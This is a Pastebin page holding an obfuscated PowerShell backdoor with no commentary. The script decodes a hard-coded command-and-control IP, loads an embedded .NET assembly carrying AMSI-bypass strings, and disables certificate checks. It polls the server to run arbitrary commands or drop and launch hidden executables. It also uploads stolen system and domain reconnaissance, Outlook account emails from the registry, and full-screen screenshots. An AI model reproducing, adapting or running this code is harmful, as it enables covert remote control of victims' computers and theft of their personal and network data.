Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- $NNLYGF = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("MTYyLjI0NC4zMi4yMTA="))
- $cyzdkER = New-Object IO.Compression.GzipStream([IO.MemoryStream][Convert]::FromBase64String("MZ^C^D@^N^_^N !^AL!This program cannot be run in DOS mode.
- $PEL^A^CF]^^B!^K^A^H$^FB `@ ^B^D^D^B^C@^P^P^P^P^PBK`^B^L^H H.text" $^B `.rsrc^B`^D&@@.reloc^L^B*@BBH^B^E1^P^A^S0^D!^A^A^Q^Br^Apo^F
- Module>tools.dllVOSuZYD8FNKOxAbCmS6aZr57rLmscorlibSystemObjectMulticastDelegateVirtualAllocCreateThreadGetExitCodeThreadWaitForSingleObjectciigDofE2WJKuCPMXAeavFzIAwjrVzS
- ystem.ReflectionAssemblyEY8boPKQ66jxWGGzCVW4NFU96JN1jsIFABX0gUS0qiEEH2hcikKINKE7eLklFpgmeHqrGdVhyf0Ao3srLCSD0NpfmZzGsvKNWvNloWsf0gNbVY3kORjoXPXYJ0NBBsB30BKDm66dTucfS08BLyHjD.ctorInvokeIAsyncResultAsyncCallbackBeginInvokeEndInvokeabcdefSystem.Run
- time.InteropServicesMarshalAsAttributeUnmanagedTypeOutAttributebytessinputoutputkeydataividstatuspostobjectmethodparamcallbackresultSystem.Runtime.CompilerServicesCompilationRelaxationsAttributeRuntimeCompatibilityAttributetoolsDllImportAttribut
- ekernel32kernel32.dllTypeGetTypeFieldInfoBindingFlagsGetFieldBooleanSetValueEnvironmentOperatingSystemget_OSVersionVersionget_VersionSystem.Security.PrincipalWindowsIdentityGetCurrentSecurityIdentifierget_UserIdentityReferenceget_ValueCharString
- SplitSystem.IOMemoryStreamBinaryWriterStreamUInt32ParseWriteSystem.TextEncodingget_Unicodeget_MachineNameGetBytesIntPtrget_Sizeget_Majorget_Minorget_BuildCloseToArrayEmptyStringBuilderAppendToStringget_LengthRandomget_CharsNextByteBitConverterTo
- UInt32ConcatNextBytesArrayCopyBinaryReaderReadUInt32ReadBytesMarshalToInt64Zeroop_Explicitop_EqualityGetLastWin32ErrorRuntimeTypeHandleGetTypeFromHandleDelegateGetDelegateForFunctionPointer.cctor<PrivateImplementationDetails>{ABD96C57-B1A0-4231-
- 99EC-8FB36F9D429D}CompilerGeneratedAttributeValueType__StaticArrayInitTypeSize=808$$method0x6000017-1RuntimeHelpersRuntimeFieldHandleInitializeArray__StaticArrayInitTypeSize=1019$$method0x6000017-2UnmanagedFunctionPointerAttributeCallingConventi
- onMSystem.Management.Automation.AmsiUtils^]amsiInitFailed^C/ .asp .jpgWl1Boz\V
- ^AInternalNametools.dll(^B^ALegalCopyright <
- ^AOriginalFilenametools.dll^AProductVersion0.0.0.0^AAssembly Version0.0.0.0@^L2"), [IO.Compression.CompressionMode]::Decompress)
- $rbUlVfzYtPXFVR = New-Object byte[](20480)
- $cyzdkER.Read($rbUlVfzYtPXFVR, 0, 20480) | Out-Null
- [System.Reflection.Assembly]::Load($rbUlVfzYtPXFVR) | Out-Null
- [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
- [VOSuZYD8FN.VOSuZYD8FN]::EY8boPKQ66jxWGG([Ref].Assembly)
- iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("ZnVuY3Rpb24gellXWXA4UklzKFtzdHJpbmddICRwYXRoKQp7CiAgICAkQkVWaTJ0eiA9ICIiCiAgICB0cnkgewogICAgICAgICRIdzY2bVZnWUsgPSAoR2V0LUl0ZW1Qcm9wZXJ0eSAkcGF0aCB8IFdoZXJlIHskXyAtbWF0Y2ggJ0FjY291bnQgTmFtZSd9KQogICAgICAgIGZvcmVhY2ggKCRtIGluICRIdzY2bVZnWUspIHsKICAgICAgICAgICAgdHJ5IHsKICAgICAgICAgICAgICAgIGlmICgkbS4iQWNjb3VudCBOYW1lIi5HZXRUeXBlKCkuSXNBcnJheSkgewogICAgICAgICAgICAgICAgICAgICRtbCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKCRtLiJBY2NvdW50IE5hbWUiKQogICAgICAgICAgICAgICAgfSBlbHNlIHskbWwgPSAkbS4iQWNjb3VudCBOYW1lIn0KICAgICAgICAgICAgICAgIGlmICgkbWwgLW1hdGNoICJAIikgewogICAgICAgICAgICAgICAgICAgICRCRVZpMnR6ICs9ICJlbWFpbDogIiArICRtbCArICJgbiIKICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgfSBjYXRjaCB7fQogICAgICAgIH0KICAgICAgICAkSHc2Nm1WZ1lLID0gKEdldC1JdGVtUHJvcGVydHkgJHBhdGggfCBXaGVyZSB7JF8gLW1hdGNoICdFbWFpbCd9KQogICAgICAgIGZvcmVhY2ggKCRtIGluICRIdzY2bVZnWUspIHsKICAgICAgICAgICAgdHJ5IHsKICAgICAgICAgICAgICAgIGlmICgkbS5FbWFpbC5HZXRUeXBlKCkuSXNBcnJheSkgewogICAgICAgICAgICAgICAgICAgICRtbCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVuaWNvZGUuR2V0U3RyaW5nKCRtLkVtYWlsKQogICAgICAgICAgICAgICAgfSBlbHNlIHskbWwgPSAkbS5FbWFpbH0KICAgICAgICAgICAgICAgICRCRVZpMnR6ICs9ICJlbWFpbDogIiArICRtbCArICJgbiIKICAgICAgICAgICAgfSBjYXRjaCB7fQogICAgICAgIH0gICAgICAgIAogICAgfSBjYXRjaCB7fQogICAgJEJFVmkydHoKfQpmdW5jdGlvbiBxeXVCaE5EOHltQnphaihbaW50XSRBNXd1ckdra3FIUE9EbiwgW2J5dGVbXV0kQ1gxZW9ZNTREKQp7CiAgICAkWG1qellOVm94cXkgPSAiaHR0cHM6Ly8kTk5MWUdGLyIgKyBbVk9TdVpZRDhGTi5WT1N1WllEOEZOXTo6cGZtWnpHc3ZLTld2TmwoJEE1d3VyR2trcUhQT0RuLCAwLCAkdHJ1ZSkKICAgICRhWTRZMmdaTjEgPSBbVk9TdVpZRDhGTi5WT1N1WllEOEZOXTo6b1dzZjBnTmIoJENYMWVvWTU0RCkKICAgIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5VcGxvYWREYXRhKCRYbWp6WU5Wb3hxeSwgJGFZNFkyZ1pOMSkKfQpmdW5jdGlvbiB3alJ6Qmsydmt2KCkKewogICAgaWYgKCgoKEdldC1XbWlPYmplY3QgV2luMzJfQ29tcHV0ZXJTeXN0ZW0pLnBhcnRvZmRvbWFpbikgLWVxICRGYWxzZSApIC1vciAoIC1ub3QgJEVudjpVU0VSRE5TRE9NQUlOKSkKICAgIHsKICAgICAgICAkQkVWaTJ0eiA9ICJET01BSU46IE5PYG5gbiIKICAgIH0gZWxzZSB7ICRCRVZpMnR6ID0gIkRPTUFJTjogWUVTYG5gbiJ9CiAgICAkQkVWaTJ0eiArPSAiU1lTVEVNSU5GTzpgbmBuIiArICgoc3lzdGVtaW5mbykgLWpvaW4gImBuIikKICAgICRCRVZpMnR6ICs9ICJgbmBuSVBDT05GSUc6YG5gbiIgKyAoKGlwY29uZmlnIC9hbGwpIC1qb2luICJgbiIpCiAgICAkQkVWaTJ0eiArPSAiYG5gbk5FVFNUQVQ6YG5gbiIgKyAoKG5ldHN0YXQgLWYpIC1qb2luICJgbiIpCiAgICAkQkVWaTJ0eiArPSAiYG5gbk5FVFZJRVc6YG5gbiIgKyAoKG5ldCB2aWV3KSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5UQVNLTElTVDpgbmBuIiArICgodGFza2xpc3QpIC1qb2luICJgbiIpCiAgICAkQkVWaTJ0eiArPSAiYG5gbldIT0FNSTpgbmBuIiArICgod2hvYW1pKSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5VU0VSTkFNRTpgbmBuIiArICgobmV0IHVzZXIgJGVudjp1c2VybmFtZSAvZG9tYWluKSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5ET01BSU4gQURNSU5TOmBuYG4iICsgKChuZXQgZ3JvdXAgImRvbWFpbiBhZG1pbnMiIC9kb21haW4gKSAtam9pbiAiYG4iKQogICAgJEJFVmkydHogKz0gImBuYG5ERVNLVE9QOmBuYG4iICsgKEdldC1DaGlsZEl0ZW0gKFtlbnZpcm9ubWVudF06OmdldGZvbGRlcnBhdGgoImRlc2t0b3AiKSkgfCBPdXQtU3RyaW5nKQogICAgJEJFVmkydHogKz0gImBuYG5BVjpgbmBuIiArIChHZXQtV21pT2JqZWN0IC1OYW1lc3BhY2UgInJvb3RcU2VjdXJpdHlDZW50ZXIyIiAtUXVlcnkgIlNFTEVDVCAqIEZST00gQW50aVZpcnVzUHJvZHVjdCIpLmRpc3BsYXlOYW1lCiAgICAkQ1gxZW9ZNTREID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkQkVWaTJ0eikKICAgIHF5dUJoTkQ4eW1CemFqIDAgJENYMWVvWTU0RAp9CmZ1bmN0aW9uIGM3RUpKWDUoKQp7CiAgICAkQkVWaTJ0eiA9ICIiCiAgICAkQkVWaTJ0eiArPSB6WVdZcDhSSXMgImhrY3U6XFNvZnR3YXJlXE1pY3Jvc29mdFxPZmZpY2VcMTYuMFxPdXRsb29rXFByb2ZpbGVzXCpcOTM3NUNGRjA0MTMxMTFkM0I4OEEwMDEwNEIyQTY2NzZcKiIKICAgICRCRVZpMnR6ICs9IHpZV1lwOFJJcyAiaGtjdTpcU29mdHdhcmVcTWljcm9zb2Z0XE9mZmljZVwxNS4wXE91dGxvb2tcUHJvZmlsZXNcKlw5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3NlwqIgogICAgJEJFVmkydHogKz0gellXWXA4UklzICJoa2N1OlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93cyBOVFxDdXJyZW50VmVyc2lvblxXaW5kb3dzIE1lc3NhZ2luZyBTdWJzeXN0ZW1cUHJvZmlsZXNcT3V0bG9va1w5Mzc1Q0ZGMDQxMzExMWQzQjg4QTAwMTA0QjJBNjY3NlwqIgogICAgaWYgKCRCRVZpMnR6IC1uZSAiIikKICAgIHsKICAgICAgICAkQ1gxZW9ZNTREID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRCeXRlcygkQkVWaTJ0eikKICAgICAgICBxeXVCaE5EOHltQnphaiAxICRDWDFlb1k1NEQKICAgIH0KfQpmdW5jdGlvbiBudVFuaFQ1ZUszQnhydHRWKCkKewogICAgQWRkLVR5cGUgLUFzc2VtYmx5IFN5c3RlbS5XaW5kb3dzLkZvcm1zCiAgICAkR243NDR2SiA9IFtXaW5kb3dzLkZvcm1zLlN5c3RlbUluZm9ybWF0aW9uXTo6VmlydHVhbFNjcmVlbgogICAgJHhNSENaTzk4V1dXeDdaeCA9IE5ldy1PYmplY3QgRHJhd2luZy5CaXRtYXAgJEduNzQ0dkouV2lkdGgsICRHbjc0NHZKLkhlaWdodAogICAgJERSeXdrc2hCQmhwID0gW0RyYXdpbmcuR3JhcGhpY3NdOjpGcm9tSW1hZ2UoJHhNSENaTzk4V1dXeDdaeCkKICAgICREUnl3a3NoQkJocC5Db3B5RnJvbVNjcmVlbigkR243NDR2Si5Mb2NhdGlvbiwgW0RyYXdpbmcuUG9pbnRdOjpFbXB0eSwgJEduNzQ0dkouU2l6ZSkKICAgICREUnl3a3NoQkJocC5EaXNwb3NlKCkKICAgICRCWEQyMk82ID0gTmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtCiAgICAkVHNDRDR4dE09NDAKICAgICRhWTRZMmdaTjFvZGVyUGFyYW1zID0gTmV3LU9iamVjdCBTeXN0ZW0uRHJhd2luZy5JbWFnaW5nLkVuY29kZXJQYXJhbWV0ZXJzCiAgICAkYVk0WTJnWk4xb2RlclBhcmFtcy5QYXJhbVswXSA9IE5ldy1PYmplY3QgRHJhd2luZy5JbWFnaW5nLkVuY29kZXJQYXJhbWV0ZXIgKFtTeXN0ZW0uRHJhd2luZy5JbWFnaW5nLkVuY29kZXJdOjpRdWFsaXR5LCAkVHNDRDR4dE0pCiAgICAkV0RqcXpLWlVKbyA9IFtEcmF3aW5nLkltYWdpbmcuSW1hZ2VDb2RlY0luZm9dOjpHZXRJbWFnZUVuY29kZXJzKCkgfCBXaGVyZS1PYmplY3QgeyAkXy5Gb3JtYXREZXNjcmlwdGlvbiAtZXEgIkpQRUciIH0KICAgICR4TUhDWk85OFdXV3g3Wnguc2F2ZSgkQlhEMjJPNiwgJFdEanF6S1pVSm8sICRhWTRZMmdaTjFvZGVyUGFyYW1zKQogICAgJHhNSENaTzk4V1dXeDdaeC5EaXNwb3NlKCkKICAgICRDWDFlb1k1NEQgPSBbY29udmVydF06OlRvQmFzZTY0U3RyaW5nKCRCWEQyMk82LlRvQXJyYXkoKSkKICAgICRDWDFlb1k1NEQgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpBU0NJSS5HZXRCeXRlcygkQ1gxZW9ZNTREKQogICAgcXl1QmhORDh5bUJ6YWogMiAkQ1gxZW9ZNTRECn0Kd2pSekJrMnZrdgpjN0VKSlg1Cm51UW5oVDVlSzNCeHJ0dFY=")))
- while ($true)
- {
- $te3w8Flw = New-Object System.Net.WebClient
- $Qo4VVv = "https://$NNLYGF/" + [VOSuZYD8FN.VOSuZYD8FN]::pfmZzGsvKNWvNl(0, 0, $False)
- $o2DtmQ7f0UJFsmJi = $te3w8Flw.DownloadData($Qo4VVv)
- if ($o2DtmQ7f0UJFsmJi.Length -ge 48)
- {
- $XwlJhkbtP = [BitConverter]::ToUInt32($o2DtmQ7f0UJFsmJi, 0)
- $iJ9xO2Wezr = [BitConverter]::ToUInt32($o2DtmQ7f0UJFsmJi, 4)
- $tObLrJ = [VOSuZYD8FN.VOSuZYD8FN]::VY3kORjoXPXYJ0N($o2DtmQ7f0UJFsmJi[8..$o2DtmQ7f0UJFsmJi.Length])
- $AfHhsmJSgK1ruO = 100
- $DzHOZ5W = $False
- if ($tObLrJ -ne $null)
- {
- if ($XwlJhkbtP -eq 0)
- {
- $AfHhsmJSgK1ruO = [VOSuZYD8FN.VOSuZYD8FN]::BBsB30BKDm66($tObLrJ)
- }
- elseif ($XwlJhkbtP -eq 1)
- {
- try {
- $wLPf5Q11AUnp5XaA = iex ([System.Text.Encoding]::UTF8.GetString($tObLrJ)) -ErrorAction Stop | Format-Table -wrap | Out-String
- } catch {
- $wLPf5Q11AUnp5XaA = $_.Exception
- }
- $wLPf5Q11AUnp5XaA = [System.Text.Encoding]::UTF8.GetBytes($wLPf5Q11AUnp5XaA)
- qyuBhND8ymBzaj 3 $wLPf5Q11AUnp5XaA
- $AfHhsmJSgK1ruO = 0
- }
- elseif ($XwlJhkbtP -eq 2)
- {
- $AfHhsmJSgK1ruO = [VOSuZYD8FN.VOSuZYD8FN]::dTucfS08BLyHjD($tObLrJ)
- }
- elseif ($XwlJhkbtP -eq 3)
- {
- $ROcjouD = Get-Random
- $SacHMK7Mj0 = "$env:TEMP\$ROcjouD.exe"
- [System.IO.File]::WriteAllBytes($SacHMK7Mj0, $tObLrJ)
- $AfHhsmJSgK1ruO = 0
- try {
- Start-Process $SacHMK7Mj0 -windowstyle hidden -ErrorAction Stop
- Start-Sleep -s 9
- Remove-Item $SacHMK7Mj0
- } catch { $AfHhsmJSgK1ruO = 1}
- }
- elseif ($XwlJhkbtP -eq 99) { $AfHhsmJSgK1ruO = 0; $DzHOZ5W = $true}
- }
- $te3w8Flw.DownloadData("https://$NNLYGF/" + [VOSuZYD8FN.VOSuZYD8FN]::pfmZzGsvKNWvNl($iJ9xO2Wezr, $AfHhsmJSgK1ruO, $False)) | Out-Null
- }
- if ($DzHOZ5W) { Exit }
- Start-Sleep -s (Get-Random -Input @(198..249))
- ################
- function zYWYp8RIs([string] $path)
- {
- $BEVi2tz = ""
- try {
- $Hw66mVgYK = (Get-ItemProperty $path | Where {$_ -match 'Account Name'})
- foreach ($m in $Hw66mVgYK) {
- try {
- if ($m."Account Name".GetType().IsArray) {
- $ml = [System.Text.Encoding]::Unicode.GetString($m."Account Name")
- } else {$ml = $m."Account Name"}
- if ($ml -match "@") {
- $BEVi2tz += "email: " + $ml + "`n"
- }
- } catch {}
- }
- $Hw66mVgYK = (Get-ItemProperty $path | Where {$_ -match 'Email'})
- foreach ($m in $Hw66mVgYK) {
- try {
- if ($m.Email.GetType().IsArray) {
- $ml = [System.Text.Encoding]::Unicode.GetString($m.Email)
- } else {$ml = $m.Email}
- $BEVi2tz += "email: " + $ml + "`n"
- } catch {}
- }
- } catch {}
- $BEVi2tz
- }
- function qyuBhND8ymBzaj([int]$A5wurGkkqHPODn, [byte[]]$CX1eoY54D)
- {
- $XmjzYNVoxqy = "https://$NNLYGF/" + [VOSuZYD8FN.VOSuZYD8FN]::pfmZzGsvKNWvNl($A5wurGkkqHPODn, 0, $true)
- $aY4Y2gZN1 = [VOSuZYD8FN.VOSuZYD8FN]::oWsf0gNb($CX1eoY54D)
- (New-Object System.Net.WebClient).UploadData($XmjzYNVoxqy, $aY4Y2gZN1)
- }
- function wjRzBk2vkv()
- {
- if ((((Get-WmiObject Win32_ComputerSystem).partofdomain) -eq $False ) -or ( -not $Env:USERDNSDOMAIN))
- {
- $BEVi2tz = "DOMAIN: NO`n`n"
- } else { $BEVi2tz = "DOMAIN: YES`n`n"}
- $BEVi2tz += "SYSTEMINFO:`n`n" + ((systeminfo) -join "`n")
- $BEVi2tz += "`n`nIPCONFIG:`n`n" + ((ipconfig /all) -join "`n")
- $BEVi2tz += "`n`nNETSTAT:`n`n" + ((netstat -f) -join "`n")
- $BEVi2tz += "`n`nNETVIEW:`n`n" + ((net view) -join "`n")
- $BEVi2tz += "`n`nTASKLIST:`n`n" + ((tasklist) -join "`n")
- $BEVi2tz += "`n`nWHOAMI:`n`n" + ((whoami) -join "`n")
- $BEVi2tz += "`n`nUSERNAME:`n`n" + ((net user $env:username /domain) -join "`n")
- $BEVi2tz += "`n`nDOMAIN ADMINS:`n`n" + ((net group "domain admins" /domain ) -join "`n")
- $BEVi2tz += "`n`nDESKTOP:`n`n" + (Get-ChildItem ([environment]::getfolderpath("desktop")) | Out-String)
- $BEVi2tz += "`n`nAV:`n`n" + (Get-WmiObject -Namespace "root\SecurityCenter2" -Query "SELECT * FROM AntiVirusProduct").displayName
- $CX1eoY54D = [System.Text.Encoding]::UTF8.GetBytes($BEVi2tz)
- qyuBhND8ymBzaj 0 $CX1eoY54D
- }
- function c7EJJX5()
- {
- $BEVi2tz = ""
- $BEVi2tz += zYWYp8RIs "hkcu:\Software\Microsoft\Office\16.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
- $BEVi2tz += zYWYp8RIs "hkcu:\Software\Microsoft\Office\15.0\Outlook\Profiles\*\9375CFF0413111d3B88A00104B2A6676\*"
- $BEVi2tz += zYWYp8RIs "hkcu:\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\*"
- if ($BEVi2tz -ne "")
- {
- $CX1eoY54D = [System.Text.Encoding]::UTF8.GetBytes($BEVi2tz)
- qyuBhND8ymBzaj 1 $CX1eoY54D
- }
- }
- function nuQnhT5eK3BxrttV()
- {
- Add-Type -Assembly System.Windows.Forms
- $Gn744vJ = [Windows.Forms.SystemInformation]::VirtualScreen
- $xMHCZO98WWWx7Zx = New-Object Drawing.Bitmap $Gn744vJ.Width, $Gn744vJ.Height
- $DRywkshBBhp = [Drawing.Graphics]::FromImage($xMHCZO98WWWx7Zx)
- $DRywkshBBhp.CopyFromScreen($Gn744vJ.Location, [Drawing.Point]::Empty, $Gn744vJ.Size)
- $DRywkshBBhp.Dispose()
- $BXD22O6 = New-Object System.IO.MemoryStream
- $TsCD4xtM=40
- $aY4Y2gZN1oderParams = New-Object System.Drawing.Imaging.EncoderParameters
- $aY4Y2gZN1oderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $TsCD4xtM)
- $WDjqzKZUJo = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
- $xMHCZO98WWWx7Zx.save($BXD22O6, $WDjqzKZUJo, $aY4Y2gZN1oderParams)
- $xMHCZO98WWWx7Zx.Dispose()
- $CX1eoY54D = [convert]::ToBase64String($BXD22O6.ToArray())
- $CX1eoY54D = [System.Text.Encoding]::ASCII.GetBytes($CX1eoY54D)
- qyuBhND8ymBzaj 2 $CX1eoY54D
- }
- wjRzBk2vkv
- c7EJJX5
- nuQnhT5eK3BxrttV
Add Comment
Please, Sign In to add comment